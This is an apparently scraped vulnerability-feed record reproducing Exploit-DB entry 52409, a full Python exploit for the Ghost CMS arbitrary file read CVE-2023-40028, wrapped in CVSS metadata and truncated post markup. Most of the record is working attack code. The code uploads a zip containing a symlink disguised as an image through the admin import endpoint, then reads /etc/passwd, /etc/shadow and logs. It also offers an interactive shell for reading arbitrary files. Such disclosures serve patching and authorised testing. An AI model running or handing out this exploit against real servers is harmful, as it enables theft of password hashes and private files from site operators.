{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 — coding:…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Ghost CMS 5.59.1 – Arbitrary File Read”,”source”:””,”references”:””,”id”:”EDB-ID:52409″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-40028″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: Ghost CMS 5.59.1 – Arbitrary File Read\\r\\n# Date: 2023-09-20\\r\\n# Exploit Author: ibrahimsql (https:\/\/github.com\/ibrahmsql)\\r\\n# Vendor Homepage: https:\/\/ghost.org\\r\\n# Software Link: https:\/\/github.com\/TryGhost\/Ghost\\r\\n# Version: \\u003c 5.59.1\\r\\n# Tested on: Ubuntu 20.04 LTS, Windows 10, macOS Big Sur\\r\\n# CVE: CVE-2023-40028\\r\\n# Category: Web Application Security\\r\\n# CVSS Score: 6.5 (Medium)\\r\\n# Description:\\r\\n# Ghost CMS versions prior to 5.59.1 contain a vulnerability that allows authenticated users\\r\\n# to upload files that are symlinks. This can be exploited to perform arbitrary file reads\\r\\n# of any file on the host operating system. The vulnerability exists in the file upload\\r\\n# mechanism which improperly validates symlink files, allowing attackers to access files\\r\\n# outside the intended directory structure through symlink traversal.\\r\\n\\r\\n\\r\\n# Requirements: requests\\u003e=2.28.1, zipfile, tempfile\\r\\n\\r\\n# Usage Examples:\\r\\n# python3 CVE-2023-40028.py http:\/\/localhost:2368 admin@example.com password123\\r\\n# python3 CVE-2023-40028.py https:\/\/ghost.example.com user@domain.com mypassword\\r\\n\\r\\n# Interactive Usage:\\r\\n# After running the script, you can use the interactive shell to read files:\\r\\n# file\\u003e \/etc\/passwd\\r\\n# file\\u003e \/etc\/shadow\\r\\n# file\\u003e \/var\/log\/ghost\/ghost.log\\r\\n# file\\u003e exit\\r\\n\\”\\”\\”\\r\\n\\r\\nimport requests\\r\\nimport sys\\r\\nimport os\\r\\nimport tempfile\\r\\nimport zipfile\\r\\nimport random\\r\\nimport string\\r\\nfrom typing import Optional\\r\\n\\r\\nclass ExploitResult:\\r\\n def __init__(self):\\r\\n self.success = False\\r\\n self.file_content = \\”\\”\\r\\n self.status_code = 0\\r\\n self.description = \\”Ghost CMS \\u003c 5.59.1 allows authenticated users to upload symlink files for arbitrary file read\\”\\r\\n self.severity = \\”Medium\\”\\r\\n\\r\\nclass GhostArbitraryFileRead:\\r\\n def __init__(self, ghost_url: str, username: str, password: str, verbose: bool = True):\\r\\n self.ghost_url = ghost_url.rstrip(‘\/’)\\r\\n self.username = username\\r\\n self.password = password\\r\\n self.verbose = verbose\\r\\n self.session = requests.Session()\\r\\n self.session.headers.update({\\r\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\r\\n ‘Accept’: ‘application\/json, text\/plain, *\/*’,\\r\\n ‘Accept-Language’: ‘en-US,en;q=0.9’\\r\\n })\\r\\n self.api_url = f\\”{self.ghost_url}\/ghost\/api\/v3\/admin\\”\\r\\n \\r\\n def authenticate(self) -\\u003e bool:\\r\\n \\”\\”\\”Authenticate with Ghost CMS admin panel\\”\\”\\”\\r\\n login_data = {\\r\\n ‘username’: self.username,\\r\\n ‘password’: self.password\\r\\n }\\r\\n \\r\\n headers = {\\r\\n ‘Origin’: self.ghost_url,\\r\\n ‘Accept-Version’: ‘v3.0’,\\r\\n ‘Content-Type’: ‘application\/json’\\r\\n }\\r\\n \\r\\n try:\\r\\n response = self.session.post(\\r\\n f\\”{self.api_url}\/session\/\\”,\\r\\n json=login_data,\\r\\n headers=headers,\\r\\n timeout=10\\r\\n )\\r\\n \\r\\n if response.status_code == 201:\\r\\n if self.verbose:\\r\\n print(\\”[+] Successfully authenticated with Ghost CMS\\”)\\r\\n return True\\r\\n else:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Authentication failed: {response.status_code}\\”)\\r\\n return False\\r\\n \\r\\n except requests.RequestException as e:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Authentication error: {e}\\”)\\r\\n return False\\r\\n \\r\\n def generate_random_name(self, length: int = 13) -\\u003e str:\\r\\n \\”\\”\\”Generate random string for image name\\”\\”\\”\\r\\n return ”.join(random.choices(string.ascii_letters + string.digits, k=length))\\r\\n \\r\\n def create_exploit_zip(self, target_file: str) -\\u003e Optional[str]:\\r\\n \\”\\”\\”Create exploit zip file with symlink\\”\\”\\”\\r\\n try:\\r\\n # Create temporary directory\\r\\n temp_dir = tempfile.mkdtemp()\\r\\n exploit_dir = os.path.join(temp_dir, ‘exploit’)\\r\\n images_dir = os.path.join(exploit_dir, ‘content’, ‘images’, ‘2024’)\\r\\n os.makedirs(images_dir, exist_ok=True)\\r\\n \\r\\n # Generate random image name\\r\\n image_name = f\\”{self.generate_random_name()}.png\\”\\r\\n symlink_path = os.path.join(images_dir, image_name)\\r\\n \\r\\n # Create symlink to target file\\r\\n os.symlink(target_file, symlink_path)\\r\\n \\r\\n # Create zip file\\r\\n zip_path = os.path.join(temp_dir, ‘exploit.zip’)\\r\\n with zipfile.ZipFile(zip_path, ‘w’, zipfile.ZIP_DEFLATED) as zipf:\\r\\n for root, dirs, files in os.walk(exploit_dir):\\r\\n for file in files:\\r\\n file_path = os.path.join(root, file)\\r\\n arcname = os.path.relpath(file_path, temp_dir)\\r\\n zipf.write(file_path, arcname)\\r\\n \\r\\n return zip_path, image_name\\r\\n \\r\\n except Exception as e:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Error creating exploit zip: {e}\\”)\\r\\n return None, None\\r\\n \\r\\n def upload_exploit(self, zip_path: str) -\\u003e bool:\\r\\n \\”\\”\\”Upload exploit zip file to Ghost CMS\\”\\”\\”\\r\\n try:\\r\\n headers = {\\r\\n ‘X-Ghost-Version’: ‘5.58’,\\r\\n ‘X-Requested-With’: ‘XMLHttpRequest’,\\r\\n ‘Origin’: self.ghost_url,\\r\\n ‘Referer’: f\\”{self.ghost_url}\/ghost\/\\”\\r\\n }\\r\\n \\r\\n with open(zip_path, ‘rb’) as f:\\r\\n files = {\\r\\n ‘importfile’: (‘exploit.zip’, f, ‘application\/zip’)\\r\\n }\\r\\n \\r\\n response = self.session.post(\\r\\n f\\”{self.api_url}\/db\\”,\\r\\n files=files,\\r\\n headers=headers,\\r\\n timeout=30\\r\\n )\\r\\n \\r\\n if response.status_code in [200, 201]:\\r\\n if self.verbose:\\r\\n print(\\”[+] Exploit zip uploaded successfully\\”)\\r\\n return True\\r\\n else:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Upload failed: {response.status_code}\\”)\\r\\n return False\\r\\n \\r\\n except requests.RequestException as e:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Upload error: {e}\\”)\\r\\n return False\\r\\n \\r\\n def read_file(self, target_file: str) -\\u003e ExploitResult:\\r\\n \\”\\”\\”Read arbitrary file using symlink upload\\”\\”\\”\\r\\n result = ExploitResult()\\r\\n \\r\\n if not self.authenticate():\\r\\n return result\\r\\n \\r\\n if self.verbose:\\r\\n print(f\\”[*] Attempting to read file: {target_file}\\”)\\r\\n \\r\\n # Create exploit zip\\r\\n zip_path, image_name = self.create_exploit_zip(target_file)\\r\\n if not zip_path:\\r\\n return result\\r\\n \\r\\n try:\\r\\n # Upload exploit\\r\\n if self.upload_exploit(zip_path):\\r\\n # Try to access the symlinked file\\r\\n file_url = f\\”{self.ghost_url}\/content\/images\/2024\/{image_name}\\”\\r\\n \\r\\n response = self.session.get(file_url, timeout=10)\\r\\n \\r\\n if response.status_code == 200 and len(response.text) \\u003e 0:\\r\\n result.success = True\\r\\n result.file_content = response.text\\r\\n result.status_code = response.status_code\\r\\n \\r\\n if self.verbose:\\r\\n print(f\\”[+] Successfully read file: {target_file}\\”)\\r\\n print(f\\”[+] File content length: {len(response.text)} bytes\\”)\\r\\n else:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Failed to read file: {response.status_code}\\”)\\r\\n \\r\\n except Exception as e:\\r\\n if self.verbose:\\r\\n print(f\\”[-] Error during exploit: {e}\\”)\\r\\n \\r\\n finally:\\r\\n # Cleanup\\r\\n try:\\r\\n if zip_path and os.path.exists(zip_path):\\r\\n os.remove(zip_path)\\r\\n temp_dir = os.path.dirname(zip_path) if zip_path else None\\r\\n if temp_dir and os.path.exists(temp_dir):\\r\\n import shutil\\r\\n shutil.rmtree(temp_dir)\\r\\n except:\\r\\n pass\\r\\n \\r\\n return result\\r\\n \\r\\n def interactive_shell(self):\\r\\n \\”\\”\\”Interactive shell for file reading\\”\\”\\”\\r\\n print(\\”\\\\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Shell ===\\”)\\r\\n print(\\”Enter file paths to read (type ‘exit’ to quit)\\”)\\r\\n \\r\\n while True:\\r\\n try:\\r\\n file_path = input(\\”file\\u003e \\”).strip()\\r\\n \\r\\n if file_path.lower() == ‘exit’:\\r\\n print(\\”Bye Bye!\\”)\\r\\n break\\r\\n \\r\\n if not file_path:\\r\\n print(\\”Please enter a file path\\”)\\r\\n continue\\r\\n \\r\\n if ‘ ‘ in file_path:\\r\\n print(\\”Please enter full file path without spaces\\”)\\r\\n continue\\r\\n \\r\\n result = self.read_file(file_path)\\r\\n \\r\\n if result.success:\\r\\n print(f\\”\\\\n— Content of {file_path} —\\”)\\r\\n print(result.file_content)\\r\\n print(\\”— End of file —\\\\n\\”)\\r\\n else:\\r\\n print(f\\”Failed to read file: {file_path}\\”)\\r\\n \\r\\n except KeyboardInterrupt:\\r\\n print(\\”\\\\nExiting…\\”)\\r\\n break\\r\\n except Exception as e:\\r\\n print(f\\”Error: {e}\\”)\\r\\n\\r\\ndef main():\\r\\n if len(sys.argv) != 4:\\r\\n print(\\”Usage: python3 CVE-2023-40028.py \\u003cghost_url\\u003e \\u003cusername\\u003e \\u003cpassword\\u003e\\”)\\r\\n print(\\”Example: python3 CVE-2023-40028.py http:\/\/localhost:2368 admin@example.com password123\\”)\\r\\n return\\r\\n \\r\\n ghost_url = sys.argv[1]\\r\\n username = sys.argv[2]\\r\\n password = sys.argv[3]\\r\\n \\r\\n exploit = GhostArbitraryFileRead(ghost_url, username, password, verbose=True)\\r\\n \\r\\n # Test with common sensitive files\\r\\n test_files = [\\r\\n \\”\/etc\/passwd\\”,\\r\\n \\”\/etc\/shadow\\”,\\r\\n \\”\/etc\/hosts\\”,\\r\\n \\”\/proc\/version\\”,\\r\\n \\”\/var\/log\/ghost\/ghost.log\\”\\r\\n ]\\r\\n \\r\\n print(\\”\\\\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Exploit ===\\”)\\r\\n print(f\\”Target: {ghost_url}\\”)\\r\\n print(f\\”Username: {username}\\”)\\r\\n \\r\\n # Test authentication first\\r\\n if not exploit.authenticate():\\r\\n print(\\”[-] Authentication failed. Please check credentials.\\”)\\r\\n return\\r\\n \\r\\n print(\\”\\\\n[*] Testing common sensitive files…\\”)\\r\\n for test_file in test_files:\\r\\n result = exploit.read_file(test_file)\\r\\n if result.success:\\r\\n print(f\\”[+] Successfully read: {test_file}\\”)\\r\\n print(f\\” Content preview: {result.file_content[:100]}…\\”)\\r\\n else:\\r\\n print(f\\”[-] Failed to read: {test_file}\\”)\\r\\n \\r\\n # Start interactive shell\\r\\n exploit.interactive_shell()\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52409″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52409″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-11T18:06:44″,”description”:”!\/usr\/bin\/env python3 — coding:…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Ghost CMS 5.59.1 – Arbitrary File Read”,”source”:””,”references”:””,”id”:”EDB-ID:52409″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-40028″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\”\\”\\”\\r\\n# Exploit Title: Ghost CMS 5.59.1 – Arbitrary File Read\\r\\n# Date:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,40,21,13,7,11,5],"class_list":["post-10384","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n